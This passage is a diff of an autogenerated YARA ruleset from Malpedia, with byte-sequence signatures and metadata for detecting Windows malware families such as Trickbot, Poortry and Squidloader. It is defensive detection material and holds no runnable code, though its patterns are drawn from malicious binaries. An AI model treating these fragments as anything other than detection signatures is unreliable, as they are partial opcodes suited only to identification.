 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b628fd83-f3fd-51c9-94aa-b13e26229dea"
+		id = "6be6a0df-09b4-53be-b501-12f03fd91cf1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.trickbot_auto.yar#L1-L652"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taleret_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "c6087fe2aa4e485109cf9851f9f0a342724e7430c1979121c1548b3fca1551c6"
+		logic_hash = "544f42faf26ff7a7e8e3048971242e57a62e785dd2bacb3cb794d982726af564"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118925,103 +119402,34 @@ rule MALPEDIA_Win_Trickbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d8 1bc0 83e002 83c002 eb0d }
-		$sequence_1 = { 83c002 eb0d 2500000080 f7d8 1bc0 83e007 40 }
-		$sequence_2 = { 83e020 83c020 eb36 2500000080 f7d8 1bc0 }
-		$sequence_3 = { a900000020 7429 a900000040 7411 }
-		$sequence_4 = { 1bc0 83e070 83c010 eb25 a900000040 7411 2500000080 }
-		$sequence_5 = { 7411 2500000080 f7d8 1bc0 83e020 83c020 eb36 }
-		$sequence_6 = { c705????????fdffffff c705????????feffffff c705????????ffffffff e8???????? }
-		$sequence_7 = { 83c724 8b07 a900000020 7429 }
-		$sequence_8 = { 895df8 895df4 895dec 66c745f00005 }
-		$sequence_9 = { 7420 3d7f000004 7419 3d7f000005 7412 3d7f000006 740b }
-		$sequence_10 = { 8b45fc 8d1489 8d0cd0 8b4114 2b410c }
-		$sequence_11 = { 488b01 4c8b4120 488b5118 488b4910 ffd0 }
-		$sequence_12 = { 488b4148 4889442438 488b4140 4889442430 488b4138 4889442428 488b4130 }
-		$sequence_13 = { 488b5118 4889442440 488b4148 4889442438 }
-		$sequence_14 = { 4c8b4928 4c8b4120 488b5118 4889442438 488b4140 4889442430 }
-		$sequence_15 = { 488b4138 4889442428 488b4130 488b4910 4889442420 41ffd2 }
-		$sequence_16 = { 488b4150 4c8b11 4c8b4928 4c8b4120 488b5118 4889442440 }
-		$sequence_17 = { 48397c2430 0f94c3 8bc3 488b5c2450 }
-		$sequence_18 = { 488d4c2450 4533c9 4533c0 ff15???????? 85c0 }
-		$sequence_19 = { 897710 488b742438 488bc7 4883c420 }
-		$sequence_20 = { d1e8 03c2 c1e806 6bc05f }
-		$sequence_21 = { 83780400 7404 8b4008 c3 }
-		$sequence_22 = { 6820bf0200 68905f0100 68905f0100 50 ff15???????? }
-		$sequence_23 = { 51 68e9fd0000 50 e8???????? }
-		$sequence_24 = { 6a40 6800300000 6a70 6a00 }
-		$sequence_25 = { c3 6a01 ff15???????? 50 }
-		$sequence_26 = { e8???????? 6a00 6a28 e8???????? }
-		$sequence_27 = { 8d440002 6a00 50 e8???????? }
-		$sequence_28 = { 8b01 59 03d0 52 }
-		$sequence_29 = { 03d0 52 ebdc 89450c }
-		$sequence_30 = { 488b01 488b4910 ffd0 ba01000000 }
-		$sequence_31 = { 8bc1 66ad 85c0 741c }
-		$sequence_32 = { 85c0 7f0b e8???????? 8b05???????? }
-		$sequence_33 = { e8???????? 83f801 7411 ba0a000000 }
-		$sequence_34 = { 50 8b450c ff4d0c ba28000000 f7e2 }
-		$sequence_35 = { c1e102 2bc1 8b00 894508 }
-		$sequence_36 = { 7405 e8???????? ff15???????? 8bc3 }
-		$sequence_37 = { 741c 3bc1 7213 2bc1 }
-		$sequence_38 = { 59 ff5508 58 894514 8b5510 }
-		$sequence_39 = { 2bc1 8b00 3bc7 72f2 }
-		$sequence_40 = { ff5508 8b5510 8b4a04 ff5508 50 51 }
-		$sequence_41 = { ba28000000 f7e2 8d9500040000 03d0 895510 }
-		$sequence_42 = { 7911 8bc8 e8???????? bb10000000 }
-		$sequence_43 = { 85c0 790f 8bc8 e8???????? 8d5e10 }
-		$sequence_44 = { 8bcf e8???????? 8bf0 85ed }
-		$sequence_45 = { 58 41 41 41 41 }
-		$sequence_46 = { 8b8e88000000 85c9 7514 398e8c000000 }
-		$sequence_47 = { 666666660f1f840000000000 8b4728 8bd6 83f801 }
-		$sequence_48 = { c744242000001f00 ff15???????? 85c0 7911 }
-		$sequence_49 = { 7536 b906000000 8bc1 c3 }
-		$sequence_50 = { 3bd1 0f8293000000 038e8c000000 3bd1 }
-		$sequence_51 = { b9e0000000 663bc1 740b b80b010000 }
-		$sequence_52 = { ff15???????? 8bf0 c1ee1f 83f601 }
-		$sequence_53 = { 41 50 2bc1 8b00 }
-		$sequence_54 = { 8bc8 33c0 85c9 0f95c0 eb02 33c0 }
-		$sequence_55 = { 50 e2fd 8bc7 57 8bec }
-		$sequence_56 = { 894504 68f0ff0000 59 8bf7 8bd7 }
-		$sequence_57 = { 8bc7 e8???????? 85c0 0f849f000000 }
-		$sequence_58 = { 8bf7 8bd7 fc 8bc1 }
-		$sequence_59 = { 8b7d10 2bf9 53 50 }
-		$sequence_60 = { ff15???????? 6a00 6a00 6a00 8d45dc 50 ff15???????? }
-		$sequence_61 = { 8dbf00500310 8bd6 897d08 3bc8 }
-		$sequence_62 = { c745d000500000 817dd000100000 760b 8b45d0 83e801 }
-		$sequence_63 = { c745cc00000000 6a00 685b020000 6a00 }
-		$sequence_64 = { 01dd f361 34aa 61 34aa }
-		$sequence_65 = { e8???????? 8d7de0 e8???????? 8b4dfc }
-		$sequence_66 = { 8bec 56 ff750c 6818280300 }
-		$sequence_67 = { 033d???????? 33c7 8d3c0e 2b75f8 33c7 2bd0 }
-		$sequence_68 = { 83f83c 762a 56 e8???????? 8d044584030101 }
-		$sequence_69 = { 8b45fc 8945c8 8b45d0 40 8945d0 ff75fc }
-		$sequence_70 = { 3d00010000 7d10 8a8c181d010000 888800f80001 40 ebe6 ff35???????? }
-		$sequence_71 = { 51 03cf 51 58 8910 59 5a }
-		$sequence_72 = { ff75fc ff75d0 e8???????? 8b45d0 48 }
-		$sequence_73 = { 8b4dd0 51 6800300400 8b55f8 52 ff15???????? }
-		$sequence_74 = { 83e0fc 03c1 be???????? 8dbf00500310 8bd6 }
-		$sequence_75 = { ff2495701b0001 8bc7 ba03000000 83e904 }
-		$sequence_76 = { c705????????fc6c0001 c705????????ec630001 c705????????4e630001 c705????????da620001 c3 8bff 55 }
-		$sequence_77 = { 12f7 5d 12f7 d93c8c }
-		$sequence_78 = { 7502 eb0c 8d55dc 52 ff15???????? ebcc c745f800000000 }
+		$sequence_0 = { 742a 8d4c2434 e8???????? 8d4c2434 c684247016000001 }
+		$sequence_1 = { bf00f34084 ff15???????? 83c40c 85c0 }
+		$sequence_2 = { 8d842458020000 8d4c2420 50 68???????? 51 e8???????? 83c40c }
+		$sequence_3 = { 8b442414 85c0 0f84b4000000 8b4c2410 03f0 2bc8 }
+		$sequence_4 = { e8???????? 8d4c2430 c68424a80300000c e8???????? 8d4c2424 c68424a80300000b e8???????? }
+		$sequence_5 = { 33f6 68???????? 89742444 e8???????? }
+		$sequence_6 = { ff15???????? eb1e 83f905 7519 8b4301 8d542420 50 }
+		$sequence_7 = { 83e003 8b74242c c1e006 0bd8 }
+		$sequence_8 = { 03f2 03c6 25ff000000 50 51 68???????? a3???????? }
+		$sequence_9 = { 8b6c2418 8b4c242c 3bcd 0f8df5000000 2be9 }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Spedear_Auto : FILE
+rule MALPEDIA_Win_Fast_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a2db92d-f6f5-5c96-a401-91440ad20972"
+		id = "5897ada5-fa61-53c9-92cd-a8ff361bb8f1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spedear_auto.yar#L1-L261"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fast_pos_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "124ef5d3fdd777d79cde8845a98f346f93848e564de2656d201aff5229611681"
+		logic_hash = "ad79c209e4e736c9fd75da8ae33e4c5c82b2aa09007c974afa8089a55c049530"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -119033,49 +119441,32 @@ rule MALPEDIA_Win_Spedear_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 99 83e207 03c2 c1f803 83c40c }
-		$sequence_1 = { 8a5f06 50 894608 e8???????? }
-		$sequence_2 = { 53 50 e8???????? 8b7e0c 895e10 }
-		$sequence_3 = { 894618 ffd7 89461c 5f }
-		$sequence_4 = { 5d 5b 5e 32c0 5f 8b4c2428 }
-		$sequence_5 = { 6a00 68???????? e8???????? 83c40c 68d0070000 }
-		$sequence_6 = { 33c0 396f1c 0f8687000000 8b4e04 }
-		$sequence_7 = { 8b0c39 33ca 890f 83c704 836c241801 }
-		$sequence_8 = { 33ce 836c241001 8b742414 75af 8b4204 33c1 8b0a }
-		$sequence_9 = { 7314 57 e8???????? 83c404 5f 896e10 5d }
-		$sequence_10 = { 833e00 741a 6a00 6a00 ff7608 }
-		$sequence_11 = { ff7608 ff5604 6800800000 6a00 ff7608 ff15???????? }
-		$sequence_12 = { 394878 7456 39487c 7451 }
-		$sequence_13 = { 8bc7 5e 5f 5b 5d c3 6a08 }
-		$sequence_14 = { 50 c685ecfeffff00 e8???????? 83c40c 8d8dccfeffff e8???????? }
-		$sequence_15 = { 4d63c0 498bd1 488bcb e8???????? }
-		$sequence_16 = { 4154 4883ec20 4c8d2508910000 33f6 33ff 498bdc 837b0801 }
-		$sequence_17 = { 4883ec20 488d05cf8b0000 8bda 488bf9 488901 }
-		$sequence_18 = { 40 5d c3 e8???????? e8???????? 6a00 ff15???????? }
-		$sequence_19 = { 759f 418b4344 458b5340 4883c302 }
-		$sequence_20 = { 68???????? 6a02 6a65 ff15???????? 50 8bcb e8???????? }
-		$sequence_21 = { c744243004010000 e8???????? 488b4c2438 4c8d5c2430 488d842450010000 488d15f0bd0000 4c895c2428 }
-		$sequence_22 = { ffd7 8bf0 3bf3 7f14 8b75dc 68???????? e8???????? }
-		$sequence_23 = { 488d05cd980000 c3 4053 4883ec20 }
-		$sequence_24 = { 8bb5c4fbffff 6bc009 0fb6843030e92300 6a08 }
-		$sequence_25 = { 7416 488d0d2d120100 e8???????? 85c0 7406 }
-		$sequence_26 = { e8???????? 488be8 4885c0 740d 488d0541be0000 }
+		$sequence_0 = { 837efc00 8d56fc 8bc8 7c1f }
+		$sequence_1 = { 8b95e4feffff 8bcf 83c2f0 8d420c f00fc108 49 85c9 }
+		$sequence_2 = { 8b95e4feffff 83c408 83c2f0 8bcf 8d420c f00fc108 }
+		$sequence_3 = { ff15???????? 50 ff36 8d85e0feffff }
+		$sequence_4 = { 50 8d85ecfeffff 50 6a00 6a00 68???????? ffb5e8feffff }
+		$sequence_5 = { c785e0feffff01000000 c785e8feffff00000000 c785e4feffff04010000 ff15???????? 85c0 7558 }
+		$sequence_6 = { ff5004 80bdebfeffff00 7432 8d8de4feffff e8???????? ff30 }
+		$sequence_7 = { 8d4710 8b4ef4 41 51 56 51 }
+		$sequence_8 = { c785e8feffff01000000 e8???????? 83c40c 8bc6 }
+		$sequence_9 = { 6a64 8d4580 c745fc00000000 50 89b578ffffff c7857cffffff00000000 ff15???????? }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Cycbot_Auto : FILE
+rule MALPEDIA_Win_Malumpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0739459b-9989-5273-9ccc-a0e809393001"
+		id = "8c530445-714c-5545-b19e-0b83bc49baf4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cycbot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.malumpos_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "5d47f4f5e3abd3b5df89c0d09b456bd0060fa6da83993d889b58fda1585abda3"
+		logic_hash = "3114be15227a95c744ccca089995ccddd28287774a7cad476fe879d040c5b1ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119089,32 +119480,32 @@ rule MALPEDIA_Win_Cycbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? be04010000 56 8d85e8feffff 50 68???????? ff15???????? }
-		$sequence_1 = { e8???????? 59 8945f0 3bc3 7415 ffb60c010000 8b4d0c }
-		$sequence_2 = { 899c2454020000 ff15???????? 399c2450020000 7423 6aff ffb42454020000 ffd6 }
-		$sequence_3 = { 740f 8b0b 8b16 51 52 50 e8???????? }
-		$sequence_4 = { eb30 8d51ff 3bc2 7322 8d9b00000000 8b8c85ccfaffff 898c85c8faffff }
-		$sequence_5 = { 89b5e8feffff e8???????? 83c40c 53 6a1a 8d85f0feffff 50 }
-		$sequence_6 = { 832000 eb26 ffb5d4eeffff e8???????? 59 ffb5cceeffff ff15???????? }
-		$sequence_7 = { 8b8d7cffffff 83c404 51 33f6 e8???????? 83c404 8bc6 }
-		$sequence_8 = { 8d45e8 50 56 e8???????? 83c408 85c0 750a }
-		$sequence_9 = { e8???????? ffb57cdeffff 8bf0 e8???????? 59 89b57cdeffff 8b9584deffff }
+		$sequence_0 = { 25ffffffff f8 ff45fc 0fb705???????? 8b55fc 8d0441 }
+		$sequence_1 = { 750b 68???????? e8???????? 59 8d45cc }
+		$sequence_2 = { 57 2d00000000 5f 7b03 f6c7cb 0af6 f7c344f267d3 }
+		$sequence_3 = { 5b 7c05 53 80c400 5b }
+		$sequence_4 = { 5f 5f 5f 90 7b07 56 7603 }
+		$sequence_5 = { 7805 0500000000 57 3500000000 }
+		$sequence_6 = { 8a0432 3c3d 7506 8365fc00 eb0d }
+		$sequence_7 = { 7429 8b45f4 3b4618 7321 }
+		$sequence_8 = { a3???????? 391d???????? 7515 be???????? e8???????? 50 }
+		$sequence_9 = { 66a94a47 83c000 56 7e04 57 85c9 }
 
 	condition:
-		7 of them and filesize < 1163264
+		7 of them and filesize < 542720
 }
-rule MALPEDIA_Win_Parasite_Http_Auto : FILE
+rule MALPEDIA_Win_Poortry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5a52ac1-7407-5488-8891-0827582e53ff"
+		id = "a1a56f3e-7edd-5f6c-95ad-6a7e0151c6bc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.parasite_http_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poortry_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "b1b7675b20fef7b5b4abd1833972b96c480194b45d3d066a629b96c3dbbd6baa"
+		logic_hash = "061aa3c00188d534d84cadb6424381cd58cb3c5879a428a6e59fbe1a6fec0983"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119128,32 +119519,32 @@ rule MALPEDIA_Win_Parasite_Http_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7509 8bce e8???????? ebe0 8bc6 5f }
-		$sequence_1 = { 85f6 5e 5b 750a 837dfc00 7504 33c0 }
-		$sequence_2 = { c745f8???????? c745fc???????? 8b4cb5e4 e8???????? 8bf8 85ff 7412 }
-		$sequence_3 = { 0f84e2000000 e8???????? bf50450000 85c0 7418 8b483c }
-		$sequence_4 = { be???????? 8bce e8???????? 8bd0 8bce e8???????? 8bf0 }
-		$sequence_5 = { 75fa 53 6800000008 6a40 8d45e8 894de8 }
-		$sequence_6 = { e8???????? 8bc8 e8???????? b900040000 8945f8 e8???????? 8b0d???????? }
-		$sequence_7 = { 57 85c0 7419 e8???????? 0345fc 59 50 }
-		$sequence_8 = { 33c0 b910040000 40 a3???????? 8d85dcfbffff 8818 40 }
-		$sequence_9 = { ffd0 5f 5e 5b 5d c20c00 53 }
+		$sequence_0 = { 55 d3d5 660fbae555 0fbafd34 310424 40fecd 40c0cd6d }
+		$sequence_1 = { 48f7d0 98 80c207 c6c434 6698 0f95c0 d0ca }
+		$sequence_2 = { f6c3d5 81f2e415f772 664181f9192e 443aec 4184f8 4152 311424 }
+		$sequence_3 = { 4032f3 4150 6699 87d2 d2fe 55 40c0f59a }
+		$sequence_4 = { f9 4180fc33 56 313c24 402af1 5e }
+		$sequence_5 = { f5 f7c7ed4a0055 80fcbc 81f30340226b 4180fef8 f8 81c3793acb71 }
+		$sequence_6 = { f5 4181f0a6605c4b 41d1c0 57 4080f71e 4584ee 44310424 }
+		$sequence_7 = { 6698 fec4 4881f2933d9011 4898 490fbfc4 98 48ffc2 }
+		$sequence_8 = { 55 f8 4863e8 4c0fa3cd 310c24 6681dd6e1b }
+		$sequence_9 = { d2ef 660fbae309 453ad5 5b f6c68b 4180fa75 f5 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 8078336
 }
-rule MALPEDIA_Win_Get2_Auto : FILE
+rule MALPEDIA_Win_Safenet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d0e8698-7ca7-5de8-bc9d-fbf1a289749b"
+		id = "44c128f1-e37d-585a-b061-6d17f8062460"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.get2_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.safenet_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "3e4ed8755efbe8103bdeb8a3d5374ebaab1badd22c715ede9aefa416798b3d3f"
+		logic_hash = "6d1c99e82abc5d35c1a893047f41638ddfbde9bad49f347bcf5718bfe865543c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119167,38 +119558,32 @@ rule MALPEDIA_Win_Get2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 52 8d8d24ffffff 895dfc e8???????? c645fc02 }
-		$sequence_1 = { e8???????? ff7508 8d55d8 8d8d24ffffff }
-		$sequence_2 = { 32c0 85d2 744e 8b898c000000 85c9 7444 8b4508 }
-		$sequence_3 = { c20800 64a12c000000 8b15???????? 56 8bf1 8b1490 }
-		$sequence_4 = { f20f110c24 ffd2 59 59 b001 }
-		$sequence_5 = { 0f849e000000 807d0c00 0f859a000000 f6c104 7430 }
-		$sequence_6 = { 74d5 8d4d84 e8???????? 8d4584 c645fc03 50 }
-		$sequence_7 = { 43 897de8 33c0 895dd4 668945d8 51 51 }
-		$sequence_8 = { 4e8d04f500000000 33d2 e8???????? 448b06 33d2 488b4e20 }
-		$sequence_9 = { ebcc 49ffc5 4d3bef 72b4 }
-		$sequence_10 = { 4103c9 443bc1 0f82f8000000 66ffc2 66413bd3 }
-		$sequence_11 = { 4c8d0d655f0100 b905000000 4c8d05515f0100 488d15dad90000 e8???????? 488bf8 }
-		$sequence_12 = { 4d8b742408 498b1c24 4533ff 493bde }
-		$sequence_13 = { eb13 498bd6 498bcf e8???????? 84c0 }
-		$sequence_14 = { 7468 4885ff 7e5b 488b06 }
-		$sequence_15 = { 56 57 488d6c24a0 4881ec60010000 48c7442428feffffff }
+		$sequence_0 = { 837dec00 7405 ff75ec ff16 837de800 7405 }
+		$sequence_1 = { 6a01 5b 33f6 663bc6 7437 663d2200 }
+		$sequence_2 = { 8d4de8 e8???????? 6a01 8d4dd0 e8???????? eb0e e8???????? }
+		$sequence_3 = { 75dc 8901 ebf3 56 }
+		$sequence_4 = { 56 6a01 68000000c0 ff7514 ff15???????? }
+		$sequence_5 = { 397de4 0f85dc020000 ff15???????? 0fb6c8 33d2 }
+		$sequence_6 = { 754e 83602000 8b7604 e9???????? 8b4808 397920 7518 }
+		$sequence_7 = { 85c0 7509 837df801 0f94c0 8bf8 ff75fc ff15???????? }
+		$sequence_8 = { 2bd1 8d34b5d8d84000 832600 83c60c 4a }
+		$sequence_9 = { 8dbd7cffffff 59 f3ab 8b462c 33ff 3bc7 c7857cffffff24000000 }
 
 	condition:
-		7 of them and filesize < 720896
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Goldenspy_Auto : FILE
+rule MALPEDIA_Win_Squidloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e7dd5e3-178b-5910-8098-c42b951969b2"
+		id = "e1ae0a2d-727c-526d-ba6d-df7206fb7292"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.goldenspy_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squidloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.squidloader_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "b60928ded54ec1e6882e1e84d68fbc49ae085baf6e4863bae7fd0036613f3bf4"
+		logic_hash = "457a1f3d7d17509f684b88b8b92c880d3534d76469a8f93e7dd90a9494a02ca3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119212,32 +119597,34 @@ rule MALPEDIA_Win_Goldenspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8d00ffffff e8???????? 8d4638 c645fc1d 50 8d8d18ffffff e8???????? }
-		$sequence_1 = { 50 e8???????? 83c404 c786c800000000000000 83bed000000000 7413 8b86cc000000 }
-		$sequence_2 = { ff4724 83fa10 7228 8b4dd0 42 8bc1 81fa00100000 }
-		$sequence_3 = { 68???????? e8???????? a1???????? 83c40c c787d400000004000000 53 ffb7cc000000 }
-		$sequence_4 = { 6a00 6a02 c745fc00000000 ff15???????? 8b95b8feffff 8bd8 83fbff }
-		$sequence_5 = { 83c408 c3 8b4df0 e9???????? 8b4df0 83c14c }
-		$sequence_6 = { e8???????? 83c408 c3 6a10 8b45f0 }
-		$sequence_7 = { 745f 51 c745fc00000000 e8???????? 83f8ff 7459 8b450c }
-		$sequence_8 = { 8d8d18ffffff e8???????? 8b55ec 83fa10 7228 8b4dd8 }
-		$sequence_9 = { 8b01 8b400c ffd0 8945e0 8d45e0 c645fc2c 50 }
+		$sequence_0 = { 4c8d0ddcfdffff 448d4008 e8???????? 488bcb ff15???????? 4533e4 4983c708 }
+		$sequence_1 = { 4889742420 57 4881ec90000000 488b05???????? 4833c4 4889842480000000 488bda }
+		$sequence_2 = { 5f 5e c3 4053 4883ec30 488bd9 8b4934 }
+		$sequence_3 = { 48c1fa03 4c3be2 7417 492bd4 4a8d0ce7 4c8d0ddcfdffff 448d4008 }
+		$sequence_4 = { 4a8d04a500000000 4c8d0480 8b5e08 4585ff }
+		$sequence_5 = { 7402 8902 33db 48c7411807000000 488d156bd80200 }
+		$sequence_6 = { 7403 49ffcb 400fb6d6 488d1d2ce70000 }
+		$sequence_7 = { 4a8d04a500000000 4585e4 48c7c1ffffffff 480f49c8 e8???????? 4989c7 }
+		$sequence_8 = { 4a8d04a500000000 4c8d0440 4c8bbc24e8020000 488b8424f0020000 }
+		$sequence_9 = { 4a8d04a6 4883c008 f3420f7e4c8608 f3420f7e44a608 }
+		$sequence_10 = { 7402 890e 4863c1 488d15c8d50200 }
+		$sequence_11 = { 7403 48ffcd 488bfd 48c1e705 }
 
 	condition:
-		7 of them and filesize < 1081344
+		7 of them and filesize < 18701312
 }
-rule MALPEDIA_Win_Lowkey_Auto : FILE
+rule MALPEDIA_Win_Cloudburst_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a67007e-1a9c-5f31-b37c-8c32fdff3311"
+		id = "b338a4c1-8ad1-5066-b3d2-7c247a054c09"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lowkey_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloudburst_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "9d3c45875e4ddd32bb18b8cb6ded5fb4838ad62f27365a87e2390b683b239917"
+		logic_hash = "68d67b600a1326ab834c6a6b6204bba9f511b6494e369c94d17eaf52125b8157"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119251,32 +119638,32 @@ rule MALPEDIA_Win_Lowkey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d8bc7 e8???????? 2bef 396e1c 7f03 8b6e20 488b4e10 }
-		$sequence_1 = { 8bc2 488d15a468feff c1e803 89442448 448be0 89442440 85c0 }
-		$sequence_2 = { 750d ff15???????? 33c0 e9???????? f644242010 7438 807c244c2e }
-		$sequence_3 = { 44897c2420 4c8d4c2448 4c8d0544e7ffff 33d2 33c9 ff15???????? 4889442440 }
-		$sequence_4 = { 4489742420 33c9 ff15???????? 488bf8 e9???????? 6644896c243d }
-		$sequence_5 = { 76c4 b868000000 895c2438 4c8d8570090000 6689442435 488d542430 }
-		$sequence_6 = { 488d542450 488b4808 e8???????? eb4e b9d6000000 663bc1 }
-		$sequence_7 = { 33ff e8???????? 448bc3 8d5701 }
-		$sequence_8 = { c784243001000043726561 488d8c243c010000 c784243401000074655468 c784243801000072656164 448d4274 e8???????? }
-		$sequence_9 = { 4c8d0dd8d70300 418d4002 83f801 7617 498bd0 498bc0 83e23f }
+		$sequence_0 = { 488b4508 498bcd 4889442428 e8???????? b904000000 }
+		$sequence_1 = { 45894c2424 418bf9 4133f8 4433df 41897c2428 45895c242c 418bc3 }
+		$sequence_2 = { 7205 80f97a 7614 80f941 }
+		$sequence_3 = { 33d6 41891424 4133d3 33fa 4189542404 33df }
+		$sequence_4 = { 743e 488b0d???????? 4c8d4c2448 488bd7 ff15???????? }
+		$sequence_5 = { 448bc3 4533c2 4133e8 45894424f8 41896c24fc 8bc5 c1e810 }
+		$sequence_6 = { 80f97a 7614 80f941 7205 80f95a 760a 80f930 }
+		$sequence_7 = { 0430 4388441802 83c303 4983c003 41ffc1 }
+		$sequence_8 = { 43895403fa 4183f904 7cc0 418b8700020000 48895c2438 }
+		$sequence_9 = { 8bc6 c1ee10 c1e808 c1e208 }
 
 	condition:
-		7 of them and filesize < 643072
+		7 of them and filesize < 2363392
 }
-rule MALPEDIA_Win_Adkoob_Auto : FILE
+rule MALPEDIA_Win_Sasfis_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d0574c1-9926-5334-bfa7-9cdc9299a5a4"
+		id = "c173d20c-b6af-5642-9dac-436a162fb4a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.adkoob_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sasfis_auto.yar#L1-L121"
 		license_url = "N/A"
